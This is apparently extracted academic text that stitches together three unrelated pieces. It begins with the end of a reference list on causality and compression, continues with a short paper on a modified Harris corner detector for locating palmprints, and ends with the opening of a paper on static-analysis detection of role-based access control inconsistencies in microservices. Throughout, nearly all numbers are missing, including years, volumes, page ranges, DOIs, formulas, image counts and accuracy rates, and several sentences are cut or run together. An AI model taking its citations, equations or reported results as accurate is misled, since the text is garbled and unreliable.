/peerj-cs. barnett l, seth ak. . the mvgc multivariate granger causality toolbox: a new approach to granger-causal inference. journal of neuroscience methods : – doi . /j.jneumeth. . . . barrett ab, barnett l. . granger causality is designed to measure effect, not mechanism. frontiers in neuroinformatics :article doi . /fninf. . . bauer m, cox jw, caveness mh, downs jj, thornhill nf. . finding the direction of disturbance propagation in a chemical process using transfer entropy. ieee trans- actions on control systems technology ( ): – doi . /tcst. . . baumöhl e, vỳrost t. . stock market integration: granger causality testing with respect to nonsynchronous trading effects. czech journal of economics & finance ( ): – . budhathoki k, vreeken j. . causal inference by compression. in: ieee th international conference on data mining (icdm). piscataway: ieee, – . chiou-wei sz, chen c-f, zhu z. . economic growth and energy consumption revisited: evidence from linear and nonlinear granger causality. energy economics ( ): – doi . /j.eneco. . . . cilibrasi rl. . statistical inference through data compression. amsterdam: institute for logic, language and computation. cover tm, thomas ja. . elements of information theory. hoboken: john wiley & sons. dhamala m, rangarajan g, ding m. . estimating granger causality from fourier and wavelet transforms of time series data. physical review letters ( ): - – - doi . /physrevlett. . . friston k, harrison l, penny w. . dynamic causal modelling. neuroimage ( ): – doi . /s - ( ) - . glover gh. . overview of functional magnetic resonance imaging. neurosurgery clinics ( ): – doi . /j.nec. . . . goldberger al, amaral la, glass l, hausdorff jm, ivanov pc, mark rg, mietus je, moody gb, peng c-k, stanley he. . physiobank, physiotoolkit, and physionet. circulation ( ):e –e doi . / .cir. . .e . granger c. . investigating causal relations by econometric models and cross-spectral methods. econometrica ( ): – doi . / . hiemstra c, jones jd. . testing for linear and nonlinear granger causality in the stock price-volume relation. the journal of finance ( ): – . jost c, ellner sp. . testing for predator dependence in predator-prey dynamics: a non-parametric approach. proceedings of the royal society b: biological sciences ( ): – doi . /rspb. . . kim s-g, richter w, uǧurbil k. . limitations of temporal resolution in functional mri. magnetic resonance in medicine ( ): – doi . /mrm. . laguna p, moody gb, mark rg. . power spectral density of unevenly sampled data by least-square analysis: performance and application to heart rate signals. ieee transactions on biomedical engineering ( ): – doi . / . . kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . /fninf. . http://dx.doi.org/ . /tcst. . http://dx.doi.org/ . /j.eneco. . . http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.nec. . . http://dx.doi.org/ . / .cir. . .e http://dx.doi.org/ . / http://dx.doi.org/ . /rspb. . http://dx.doi.org/ . /mrm. http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. lempel a, ziv j. . on the complexity of finite sequences. ieee transactions on information theory ( ): – doi . /tit. . . marinazzo d, pellicoro m, stramaglia s. . kernel method for nonlinear granger causality. physical review letters ( ): - – - doi . /physrevlett. . . montalto a, faes l, marinazzo d. . mute: a matlab toolbox to compare established and novel estimators of the multivariate transfer entropy. plos one ( ):e doi . /journal.pone. . mosedale tj, stephenson db, collins m, mills tc. . granger causality of coupled climate processes: ocean feedback on the north atlantic oscillation. journal of climate ( ): – doi . /jcli . . nagaraj n, balasubramanian k. a. dynamical complexity of short and noisy time series. the european physical journal special topics : – . nagaraj n, balasubramanian k. b. three perspectives on complexity: en- tropy, compression, subsymmetry. the european physical journal special topics ( ): – doi . /epjst/e - - . nagaraj n, balasubramanian k, dey s. . a new complexity measure for time series analysis and classification. the european physical journal special topics ( – ): – doi . /epjst/e - - . paydarfar d, forger db, clay jr. . noisy inputs and the induction of on–off switch- ing behavior in a neuronal pacemaker. journal of neurophysiology ( ): – doi . /jn. . . pearl j. . causality. cambridge: cambridge university press. pearl j, mackenzie d. . the book of why: the new science of cause and effect. new york: basic books. rissanen j. . modeling by shortest data description. automatica ( ): – doi . / - ( ) - . schreiber t. . measuring information transfer. physical review letters ( ): – doi . /physrevlett. . . seth ak, barrett ab, barnett l. . granger causality analysis in neuroscience and neuroimaging. journal of neuroscience ( ): – doi . /jneurosci. - . . shannon ce. . a mathematical theory of communication, part i, part ii. the bell system technical journal : – doi . /j. - . .tb .x. stips a, macias d, coughlan c, garcia-gorriz e, san liang x. . on the causal structure between co and global temperature. scientific reports :article doi . /srep . sugihara g, may r, ye h, hsieh c, deyle e. . detecting causality in complex ecosystems. science ( ): – doi . /science. . teplan m. . fundamentals of eeg measurement. measurement science review ( ): – . veilleux bg. . the analysis of a predatory interaction between didinium and paramecium. master’s thesis, university of alberta, edmondton. kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /jcli . http://dx.doi.org/ . /epjst/e - - http://dx.doi.org/ . /epjst/e - - http://dx.doi.org/ . /jn. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /physrevlett. . http://dx.doi.org/ . /jneurosci. - . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /srep http://dx.doi.org/ . /science. http://dx.doi.org/ . /peerj-cs. vicente r, wibral m, lindner m, pipa g. . transfer entropy: a model-free measure of effective connectivity for the neurosciences. journal of computational neuroscience ( ): – doi . /s - - - . virmani m, nagaraj n. . a novel perturbation based compression complexity measure for networks. heliyon ( ):e doi . /j.heliyon. .e . wieczorek a, roth v. . causal compression. arxiv preprint. arxiv: . . wiener n. . the theory of prediction. modern mathematics for engineers : – . kathpalia et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.heliyon. .e http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , research on harris corner detection method in palmprint recognition system wu hejing east university of heilongjiang e-mail: @qq.com abstract—palmprint location is the premise of feature space extraction and feature recognition,the speed and accuracy of palmprint location directly affect the speed and accuracy of palmprint recognition system, and the extraction of contour feature points is the key of palmprint location. the contour of palmprint is extracted by gray morphological gradient;then, based on the analysis of palmprint appearance characteristics, harris corner is used to extract the key feature points of the image, and the reference coordinate system is established according to the key points to realize the location and segmentation of palmprint. keywords-palmprint recognition system; palmprintlocation; harris corner i. extraction of contour feature points by improved harriscorner detection method. figure . palmprint corner detection harris corner detection algorithm is a common corner extraction algorithm at present, but it can not get ideal effect when we use it directly to extract the contour feature points defined by us. as shown in figure , this paper improves harris corner detection algorithm purposefully, thus realizing the extraction of palmprint contour feature points. ii. harris corner detection the predecessor of harris algorithm is morave algorithm. morave's corner detection formula is: ) in formula e, the brightness change occurs when a small window (u, v) is moved at a point (x, y). w (x, y) is a gaussian smoothing factor.the essence of formula ( . ) is the autocorrelation of two-dimensional signals. the above formula is expanded by taylor series: ) formula: represents the horizontal and vertical derivatives of the point in the image respectively. ignore the higher order terms and write them into quadratic form: ) formula: after m similar diagonalization, the results are as follows: the eigenvalue of matrix m is obtained. because matrix m has rotation invariance and is proportional to doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , the curvature of gray scale of pixel points, if the minimum eigenvalue is greater than a given threshold, it is determined as a corner point. harris algorithm needs to determine threshold, variance of gauss function and constant variable k. when the image size is, the window size of derivative is, and the window size of gauss filter is, the complexity of the operator is, and the algorithm is slow. iii. improvements of harris corner detection algorithms in harris algorithm, the eigenvalues of matrix m are closely related to the first derivatives of pixel points in x and y direin the edge region, there is only a large change in the horizontal or vertical direction, that is, only one of them is largections; in flat areas, the changes in horizontal and vertical directions are the smallest, that is, they are small;corner area in the horizontal and vertical direction of the changes are larger points, that is, larger. according to this feature, the corner detection algorithm is improved. the feature points of palmprint contour extracted by us are located in the convex and concave areas between fingers on palmprint contour. they are composed of some flat areas and points that vary in a certain range of slope areas. in the image region, the difference between the third line and the first line is close to the derivative in the y direction.the difference between the third column and the first column is close to the derivative in the x direction. firstly, two templates dx and dy are designed. for any image region z, the derivatives of center point z in x and y directions can be defined, respectively: figure . the image region the input image is the palm edge image after thinning. according to the principle of image graphics, it is a closed curve composed of continuous single pixel points. its gray value is only and . it can be defined that the black edge point is response point and the white background is non-response point , then when there is no response point in z region (that is, all white back) == ; for the refined contour line, the corner function value c is calculated. in the case of c > , the candidate corner points are obtained. as shown in figure (b), the x coordinate values of the candidate corner points are sorted, the array of corner points is determined, and then the maximum y value of each corner point group is obtained as the corner points we want, as shown in figure (c). in order to further verify the feasibility of this algorithm, we have searched for some representative images to test the performance of corner detection algorithm, such as pentagonal star edges and some building blocks edges as shown in fig. (a), and detected the points that satisfy the condition c > . the results are shown in fig. (b). when c > (i.e., the detected feature points). international journal of advanced network, monitoring and controls volume , no. , figure . extraction of palmprint contour feature points iv. extraction process of palmprint contour feature points consistent with our previous deduction, it contains not only the points in the top corner areas, but also the points on the edge of the inclined angle, which is up and down the horizontal line (as shown in the shadows in figure . palmprint contour feature points figure . declination range the purpose of localization and normalization of palmprint image is to extract appropriate reference points from palmprint and establish reference coordinate system to reduce the influence of non-linear factors such as rotation, translation and distortion introduced in the sampling process and improve the robustness of matching recognition algorithm. good positioning results can not only provide reference frame for other palmprint features, but also provide benchmark for palmprint matching and feature matching. at the same time, it can segment the central area of palmprint, reduce unnecessary noise interference, reduce the complexity of subsequent matching algorithm, achieve azimuth-independent matching, ensure the accuracy and effectiveness of the recognition system, and in palmprint identification system. it has very important significance. international journal of advanced network, monitoring and controls volume , no. , figure . palmprint location and feature space extraction after extracting the corner points, we set up the coordinate system according to the following steps: make the line l = k k , draw an axis perpendicular to the line l from k , and we set it as the y axis; make a line l parallel to the line l and the crossing point k , obviously the line l is perpendicular to the y axis, which can be defined as the x axis, and the intersection point of the x axis and the y axis as the o point, as shown in fig. (a).the palmprint image is rotated counter-clockwise along the o-point, as shown in fig. (b), then the central area of palmprint is extracted and normalized as the palmprint feature space, as shown in fig. (c). under the above acquisition conditions, a palmprint test image database is established, which is composed of images with a size of * ( persons, each person collects images).the positioning accuracy is shown in table . the experimental results show that the desired feature points can also be found for the images with unsatisfactory collection effect. among them, images can be located accurately according to the above algorithm, so the accuracy rate is . %. table i. location results total image count correct location number error location number location accuracy . % according to the analysis of palmprint images, the main reasons for wrong location are insufficient extension of palm, incorrect placement of palm, or insufficient separation of four fingers. if the position and posture of the palm are further standardized, the error positioning rate can be further reduced. the experimental results show that the above method is simple, effective, fast and can locate and score palmprints quickly and accurately. v. conclusion in this paper, a new and purposeful exploration is made on the extraction of contour feature points in palmprint images, and the harris corner detection algorithm is improved to realize the effective extraction of contour feature points. this algorithm avoids the need to determine the threshold artificially in the traditional corner detection algorithm, simplifies it, reduces the amount of calculation, grouping candidate corners and taking only one feature point in each group, thus improving the robustness of the algorithm, and international journal of advanced network, monitoring and controls volume , no. , provides a new and effective method for solving the problem of palmprint location in palmprint recognition. reference [ ] jain, r.bole, s.pankanti. biometrics: personal identification in networked society. kluwer academic publishers. [ ] the david zhang. automated biometrics is one technologies and systems. kluwer academic publishers. [ ] n.duta, a.k.jain, k.v.mardia. matching of palmprint. pattern recognition leters. , ( ): - [ ] david zhang. automated biometrics-technologiesand systems. kluwer academic publishers, [ ] a.jain, r.bolle, s.pankanti .biometrics: personal identification in networked society. kluwer academic publishers, [ ] weishu, d.zhang. palmprint verification: an implementation of biometric technology. ieee international conference on pattern recognition. , : - [ ] n.duta, a.jain, k.mardia. matching of palmprint. pattern recognition leters. , ( ): - [ ] c.han, h.chen, c.lin, k.fan. personal authentication using palm-print features. pattern recognition. , ( ): - [ ] c.poon, d.c.m.wong, h.c.shen. a new method in locating and segmenting palmprint into region-of-interest proceedings of the th international conference on pattern recognition ieee [ ] s.mallat. multi-frequency channel decomposition of images and wavelet model. ieee transactions on information theory. , ( ) peerj-cs- .. on automated rbac assessment by constructing a centralized perspective for microservice mesh dipta das , andrew walker , vincent bushong , jan svacina , tomas cerny and vashek matyas department of computer science, baylor university, waco, tx, usa faculty of informatics, masaryk university, brno, czech republic abstract it is important in software development to enforce proper restrictions on protected services and resources. typically software services can be accessed through rest api endpoints where restrictions can be applied using the role-based access control (rbac) model. however, rbac policies can be inconsistent across services, and they require proper assessment. currently, developers use penetration testing, which is a costly and cumbersome process for a large number of apis. in addition, modern applications are split into individual microservices and lack a unified view in order to carry out automated rbac assessment. often, the process of constructing a centralized perspective of an application is done using systematic architecture reconstruction (sar). this article presents a novel approach to automated sar to construct a centralized perspective for a microservice mesh based on their rest communication pattern. we utilize the generated views from sar to propose an automated way to find rbac inconsistencies. subjects security and privacy, software engineering keywords microservices, rest, rbac, access control, authorization, security, static code analysis, systematic architecture reconstruction introduction with the software industry’s growth, the complexity of security administration is becoming more and more challenging. as the current software development trend is moving rapidly from monolithic to microservice architecture (msa), we must address communication patterns not only for the simple client to server scenarios but also for service to service scenarios. since the client-server communication pattern has existed for many years, its security implications have already been well addressed. in contrast, not much has been studied for service-to-service communication patterns. currently, the most popular way to establish communication between services is to use representational state transfer (rest) (vural, koyuncu & guney, ; salah et al., ). developing a secured rest-based infrastructure is relatively easy for a smaller number of microservices. however, the security aspects gradually become more complex as the number of microservices grows. due to their high feature set and operational complexity, modern microservice-based applications tend to have a large number of individual microservices developed separately by separate teams. enforcing a robust security solution for such applications is tedious for developers and might lead to security how to cite this article das d, walker a, bushong v, svacina j, cerny t, matyas v. . on automated rbac assessment by constructing a centralized perspective for microservice mesh. peerj comput. sci. :e doi . /peerj-cs. submitted august accepted january published february corresponding authors tomas cerny, tomas_cerny@baylor.edu dipta das, dipta_das @baylor.edu academic editor mario luca bernardi additional information and declarations can be found on page doi . /peerj-cs. copyright das et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:tomas_cerny@�baylor.�edu mailto:dipta_das @�baylor.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ disagreement among microservices. this is because individual developers only have an idea of a subset of microservices they maintain but lack an understanding of the overall picture. even system architects may not understand the complete picture of the application since many of those microservices may not be in the initial blueprint of the application but rather were added later. thus, we need to establish an automatic way to generate the overall communication pattern for the whole application before diving into the security aspects. this is done through a process of systematic architecture reconstruction (sar) in which overall views are constructed from existing application artifacts. sar is divided into four phases: extraction, construction, manipulation and analysis. in this article, we first introduce a solution for automatic sar of a microservice application, which generates a view of the microservices’ rest communication pattern. by automating the first three phases of sar and utilizing the constructed views, we can focus on the analysis phase and present an approach to enumerate possible security loopholes in the application. more specifically, we focused on finding role-based access control (rbac) inconsistencies among microservices using static code analysis. we present a case study on a single enterprise application called teacher management system (tms) consisting of four individual microservices. this application was developed separately but re-purposed here as a testbed for performing static code analysis. our work focuses on intra-and inter-microservice inconsistencies highlighting all possible rbac issues. an application’s core security requirement is to ensure that it can only be used by legitimate users (mohanty, mohanty & balakrishnan, ). rbac is one of the popular methods of securing rest services where each user of the application is assigned to a set of roles that grant access to different parts of the system. in microservice-based applications, there can be two different abstractions to enforce rbac rules. first, centralized among all the microservices and, second, per microservice-based. thus, next in this article, we focus on the centralized approach. finding inconsistencies among rbac rules in a large system is a cumbersome and difficult task due to different levels of abstractions, poor coding practices, and coupling with third-party services. according to a survey conducted in by the international data group (mohanty, mohanty & balakrishnan, ), about % of applications have not been tested for security vulnerabilities. this can be easily mitigated by enforcing standard security features during the regular software development process (mcgraw, ). ignoring such security vulnerabilities is expensive. security breaches can cost companies billions and require significant time and effort to resolve. for example, the ebay hack, which was caused by improper access control restrictions, impacted over million users (swinhoe, ). being able to list possible security vulnerabilities automatically can significantly reduce the likelihood of such incidents. system administrators should wisely choose the approaches to test the security vulnerability of the system. the most accurate outcome from such a test can be obtained via rigorous penetration testing. however, such an approach needs the application to be fully deployed, and running penetration tests against a production deployment could das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lead to disruption for end users. also, it is difficult to emulate all possible scenarios for penetration testing. in contrast, static code analysis can be a much easier alternative that does not require an application to be deployed and hence is more cost-effective. although static code analysis is no panacea, when carefully implemented, it can detect many vulnerabilities. it is for these reasons we use static code analysis for our automated sar process. the article is organized as follows. section two discusses the related work and state of the art. “proposed method” describes our proposed method in detail, and section four explores a case study. finally, we conclude our article by summarizing our work outcomes, describing our future goals, and listing the references. throughout the article, the terms “inconsistency”, “violation” and “issue” are used interchangeably to indicate a potential flaw. related work in this section, we present related work from the two different perspectives considered in this article. first, we assess the limitations of rbac analysis in the context of enterprise systems. next, we assess existing approaches for the sar. role-based access control in microservice-based applications, each microservice implements a subset of features. end-users or other microservices can access these features through an application programming interface (api). there are typically two main api development choices: rest and simple object access protocol (soap) (tihomirovs & grabis, ). while rest is an architecture for api development that works over standard http protocol, soap is just a protocol. for many years, soap was a standard approach for web service interfaces. however, it has been dominated by rest in recent years. according to stormpath, over % of public apis are designed using rest (hunsaker, ). the main advantage of rest compared to soap is its simplicity and ease of learning. rest is lightweight and hence better suited for a wide range of devices, including mobile devices (wagh & thool, ). apart from that, rest uses javascript object notation format which is faster to parse compare to extensible markup language used in soap (tihomirovs & grabis, ; castillo et al., ). securing rest api endpoints is generally easy when existing http security approaches are leveraged instead of implementing a new security model (sudhakar, ). securing rest endpoints involves both authentication and authorization (brachmann, dittmann & schubert, ). authentication is the process of verifying the credentials associated with a particular request. different enterprise applications use different strategies to authenticate incoming requests, such as basic authentication, token-based authentication, hash-based digest authentication, oauth, etc. (lee, jo & kim, ). on the other hand, authorization involves verifying whether a request connection is allowed to perform a particular action through a rest endpoint. mandatory access control, discretionary access control, attribute-based access control and rbac are popular approaches for enforcing authorization (sandhu & samarati, ). in this article, instead das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of authentication breaches, we focus on exploring and detecting possible authorization inconsistencies, specifically role-based authorization inconsistencies. role-based access control has been widely adopted as an alternative to classical discretionary and mandatory access controls because of its advancement in flexibility and detail of control (sandhu & samarati, ; sandhu et al., ). it regulates users’ access to information and system resources based on activities that users need to execute in the system and requires the identification of roles in the system (ahn & sandhu, ). rbac’s administrative capabilities have made it stand out from the alternative approaches because system administrators can statically or dynamically regulate user’s access by defining roles, role hierarchies, relationships, and constraints (ferraiolo, cugini & kuhn, ). for distributed systems, another advantage is that rbac administrative responsibilities can be divided into central and local protection domains (ferraiolo, cugini & kuhn, ). in the case of microservice-based applications, these can be translated into central policies for all associated microservices and per microservice- based policies. central rbac policies can be enforced by delegating authentication and authorization tasks to a separate identity management tool, such as red hat’s keycloak (red hat inc, a). on the other hand, individual microservices can carry out such policies using security features of underlying frameworks, such as spring-security for spring-based applications (scarioni & nardone, ). due to the high impact of security-related issues, much research and development have been done addressing role violations. ciuciu, tang & meersman ( ) described one such strategy where appropriate security annotations are recommended for developers based on the ontology extracted from the business information. however, since this recommendation strategy works only based on business information irrespective of source code, if the business information provided is flawed, then the recommendation will also be faulty. one similar study focused on finding security vulnerabilities of api implementations among different libraries based on security-sensitive events (srivastava et al., ). it finds discrepancies among security policies associated with the same api using a flow graph. the inherent drawback of this approach is that it requires multiple independent implementations of the same api, and it can not find which ones of whose multiple implementations are faulty. another research study described a model-based approach for testing access control rules based on consistency, completeness and redundancy (xu et al., ). it checks whether access control rules are consistent across the methods, whether they are unnecessarily repeated, and whether they covered all subset of permissions. however, the coverage of access control rules over a set of methods does not necessarily relate to security issues. in xu et al. ( ), the system under study does not allow a user to rent a book on maintenance due to the incompleteness of access control rules, which is more of a system flaw rather than a security issue. in contrast, our proposed method finds whether a user can access a resource-restricted by one rbac rule through an alternative path that has less restriction. the tool fixmeup (son, mckinley & shmatikov, ) proposed an automated way to fix access control issues in php applications using static code analysis. it automatically das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ edits the source code to resolve access control issues. although it seems compelling to automate the task, it might lead to syntax errors and might result in unintended consequences in case of false positives. on the other hand, our rbac tool pinpoints the location of possible inconsistencies in the source code without adversely affecting the codebase since it does not modify the source code while performing analysis. the most similar analysis to our proposed method has been described by walker et al. ( ). that tool performs static code analysis on enterprise java applications to find issues in rbac rules defined using security annotations. the key difference is that it only considers intra-microservice issues, while our method works for both intra- and inter- microservice issues, taking into account all the microservices that constitute the application. freudenthal et al. ( ) proposed a distributed rbac (drbac) mechanism that decentralizes the trust-management across multiple administrative domains. due to its distributive nature drbac is highly scalable for a large number of mutually anonymous users. it features third-party delegation that enables one authorized entity to entrust roles created by another entity. besides, it controls the access levels for the same resource by valued attributes. also, drbac presents continuous monitoring by utilizing a pub-sub model to ensure the validity of trust relationships for extended interactions. in this article we do not assess such decentralized rbac techniques, rather we assume that the user authentication and role mapping are handled through a centralized service while individual microservices are responsible for the imposition of those roles on api endpoints. separation of duties (sod) has been widely studied in the context of rbac. it ensures data integrity and fraud prevention by distributing critical tasks among multiple users (basin, burri & karjoth, ). it enforces that no single user can execute all actions and thus any kind of fraudulent activity will cause collision among at least two users (habib et al., ). in rbac, sod can either static or dynamic (sandhu, ). in the static separation of duties (ssd) constraints are enforced during the assignment of users to roles. on the other hand, in dynamic separation of duties (dsd) constraints are activated on the roles within a user session (omicini, ricci & viroli, ). in this article, we are not considering the user assignments and user sessions. instead, we performed static code analysis that solely focused on a subset of ssd including statically defined roles and role hierarchies. software architecture reconstruction although many studies address access control issues, most of them are focused on single microservice or monolith applications. however, modern cloud-based applications are commonly designed as a set of microservices for better flexibility and scalability (salah et al., ). the key challenge to perform a holistic analysis across multiple microservices is the automated construction of the application’s centralized perspective. sar extracts a representation of software architecture from source code or documentation through an iterative reverse engineering process (bass, clements & kazman, ). das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it is historically defined with four phases: extraction, construction, manipulation and analysis (bass, clements & kazman, ). in the extraction phase, all necessary artifacts are collected. each set of related artifacts is relevant to a view that represents relations among certain elements of the software architecture (bass, clements & kazman, ). the construction phase creates canonical representations of the views. then the manipulation phase combines the views to create a more compact representation to answer specific questions in the analysis phase. lastly, the analysis phase answers specific research questions from the reconstructed views. in this article, the analysis phase addresses the detection of possible rbac inconsistencies. also, to the best of our knowledge sar has not been used to detect rbac inconsistencies in msa. one approach of sar of microservice-based systems is described by rademacher, sachweh & zündorf ( ). this method describes different modeling based on different viewpoints (rademacher et al., ) where domain modeling is based on bounded context, services modeling is based on rest calls, and operation modeling is based on deployment specifications, for example, dockerfiles. the model-driven engineering (mde) approach is commonly used in sar. in mde, models are used as first-class entities to depict an efficient representation of the software architecture (cicchetti et al., ). alshuqayran, ali & evans ( ) described a manual analysis through the mde approach to reconstruct the architecture of microservice-based open-source projects. they defined a metamodel which is then mapped to the architecture using mapping rules. the metamodel and mapping rules are initially created for one system and then refined and validated using seven additional systems. however, the authors did not apply their reconstruction strategy to answer specific questions. ibrahim, bozhinoski & pretschner ( ) proposes an approach to derive msa module topology from container-based deployment configuration files, more specifically, from docker compose files. in addition to topology, they extracted the attack graph, a directed acyclic graph, to identify attack paths that lead to vulnerability exploitation. their implementation is based on a open-source vulnerability scanner for docker containers named clair (quay, ). the microart tool described by granchelli et al. ( ) extracts the deployment architecture of a microservice-based system from the source code repository. it utilizes a domain-specific language to represent key elements of the architecture by using the mde approach. it employs runtime log analysis to discover containers, network interfaces, and service interactions. however, users need to provide a reference to the container engine since microart does not automatically detect it from deployment configuration files. our proposed method reconstructs msa architecture based on the rest communication pattern, similar to the service modeling described by rademacher, sachweh & zündorf ( ). however, unlike that system, which depends on a service modeling language (rademacher et al., ), our reconstruction is solely based on static code analysis and works independently. das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ proposed method enterprise applications are typically organized into a three-layer structure: controller layer, service layer, and repository layer. it is also common to organize microservices into the presentation layer, business layer, persistence layer, and database layer (richards, ). these two commonly used structures essentially indicate the same strategy. the presentation layer maps to the controller layer, which defines api endpoints, and the business layer maps to the service layer, which contains business logic. the persistence layer maintains data access objects to interact with the database layer (alur et al., ). these two layers (persistence and database) are consolidated into the repository layer in the three-layer architecture (richards, ; steinegger et al., ). microservices typically communicate over rest apis (salah et al., ). each microservice’s controller layer defines the rest endpoints that serve as request entry points for that particular microservice. requests are delegated from the controller layer to the service layer. the service layer typically implements business logic. it processes the request and generates an appropriate response. the service layer can also incorporate with the persistence layer to store and retrieve data relevant to a specific request. however, sometimes the service layer depends on other microservices to process the request. in that case, it creates rest calls to other microservices and implements business logic based on the response. this describes a typical rest communication scenario among microservices. in particular, the service layer of one microservice makes rest calls to other microservice’s controller layers to implement its business logic. thus, the rest endpoints of each microservice can be either accessed by end-users or other microservices. enterprise frameworks adopted annotation-based configuration to define rest endpoints, for example, @restcontroller annotation in spring-based java applications and @app.route annotation in flask based python applications (vmware inc, ; pallets projects, ). since the rest endpoints are the entry points to the microservice, securing them is the single most important task for the developers. while there are several ways to enforce role-based authorization, the most widely adopted method in enterprise applications is to define authorization realms through the application server (oberle et al., ) or through separate identity management tools like keycloak (red hat inc, b). a realm is a security policy domain defined in the application server that contains a collection of users (jendrock et al., ). these users might be further organized into several groups (jendrock et al., ). centralized authorization systems like keycloak handles user authentication and role mapping. but such systems do not verify whether developers properly enforced rbac policies during api implementation or not. for example, some api endpoints might have missing rbac roles. in that case, any authenticated user can access those endpoints. similarly, two api endpoints with different roles might eventually access the same entity which might be unintentional and left unnoticed. these inconsistencies are not flagged by the centralized authorization system and thus defining authorization policies are not enough to secure the endpoints. developers need to enforce those policies within the application’s source code that runs in that application server. designing proper das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ authorization policies are just one part of ensuring robust rbac enforcement, we need to consider coding problems that might lead to security loopholes. in this article, we focused on detecting such coding problems through static code analysis. also, it is important to classify these problems to understand the severity and origin of them. we have defined five types of possible inconsistencies or violations: . missing role violations: this type of violation occurs when an api endpoint does not have any roles associated with it. in this case, all authenticated users can access the endpoint. such violation typically happens when developers forget to enforce authorization roles on an api endpoint. however, it could be false-positive, for example, some api endpoint might be intentionally left open for all users. . unknown access violations: if an api endpoint contains an authorization role that is not present in the user-defined role hierarchy, then we define it as an unknown access violation. usually this type of violation results from typographical errors and in most cases, such typos are left unnoticed since they do not cause any compilation errors. as a result, legitimate users with proper access are denied from accessing the endpoint. . entity access violations: if input and output that is, request and response types of two api endpoints are similar but they have different authorization roles, then we classify it as an entity access violation. this kind of violation indicates that the same entity is being accessed by users with different access roles. . conflicting hierarchy violations: this type of violation happens when an intermediate method in the service layer or repository layer contains two different roles that are ancestor of each other’s in the role hierarchy. this violation signifies that users with a junior role are accessing some functionalities that might be intended for users with a senior role (walker et al., ). . unrelated access violations: similar to conflicting hierarchy these violations focus on intermediate methods instead of endpoint methods. when an intermediate method contains two multiple roles that are located in different subtrees of the role hierarchy, we classify it as an unrelated access violation. this type of violation indicates poorly separated concerns while distributing access roles across different functionalities of the application (walker et al., ). like rest configurations, authorization policies are typically applied by annotating methods or functions with appropriate security annotations. these annotations can differ based on the framework used to develop the application; for example, jax-rs security annotations are used with java ee based application (oracle, ). a similar approach to enforce rbac using annotation can also be found in python applications based on the flask framework (thio, ). these security annotations define the level of restrictions applied to the associated methods or functions. table highlights the most commonly used security annotations in java ee applications supported by jsr (mordani, ; oracle, ). for example, if we add a @rolesallowed(admin) annotation to a controller endpoint method, only the users that have the “admin” role (defined in the realms) can access the das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ endpoint. however, since the number of such endpoint methods can be significant and can grow over each iteration of the development cycle, it is possible to introduce inconsistencies among the allowed roles or even missing roles. moreover, since these inconsistencies and missing roles do not cause any compilation or run time error, it is tempting for developers to overlook them, and that might result in potential security loopholes. our proposed method analyzes a set of microservice artifacts that communicate with each other through rest calls. it finds potential rbac violations for the whole microservice mesh by scrapping security metadata of individual microservices and by combining them based on their rest communication flow. we divided the analyzer into three modules: a discovery module, a flow-matcher module, and an analysis module. the discovery module implements the extraction phase of sar. it collects endpoint specification and security metadata. next, the flow-matcher module performs the construction and manipulation phases of sar by resolving the interaction among microservices. finally, the analysis module completes the analysis phase of sar and detects potential rbac violations based on the other two modules’ output. the discovery module performs static code analysis on individual microservice artifacts. it detects the rest endpoints and security roles attached to those endpoints. apart from that, it also lists the rest calls to other microservices, which are typically implemented in the service layer. the discovery module works for both source code artifacts and bytecode artifacts (e.g., jar file, python bytecode) and thus provides generalization for both interpreted languages (e.g., java, python) and compiled languages (e.g., c++, go). the source code version of the discovery module takes a microservice artifact as input and parse class definitions while the bytecode version does the same using bytecode analysis. as discussed above, both rest endpoints and security policies are typically defined using the annotation-based configuration in enterprise applications. the descriptions of these annotations are well structured and preserved in the source code and in the bytecode. the discovery module scans each class to find rest annotations and security annotations that define rest endpoints and security roles, respectively. it aggregates class-level annotations with method-level annotations to derive the complete definition of each rest endpoints. it collects the allowed roles, port, path, http type, type of request object, and type of response object for each endpoint. it takes account of all standard http types, with the most commonly used ones being get, post, put and delete. the discovery module then further analyzes service layer classes to detect rest calls to other microservices. for each rest call, it detects the url, http table java ee security annotations. annotation description @permitall all security roles are permitted @denyall no security roles are permitted @rolesallowed list of permitted security roles das et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ type, type of request object, and type of response object. it parses rest client definitions to gather those attributes. however, detecting the url string involves further intensive analysis since the url string is usually constructed by performing consecutive append operations in different parts of the source code. for this, our discovery module applies a backward recursive data flow analysis from the point where the url is used to the point where the url was initialized. in each intermediate step of the data flow where the url was referenced, it scans for any append operations and resolves them to restore 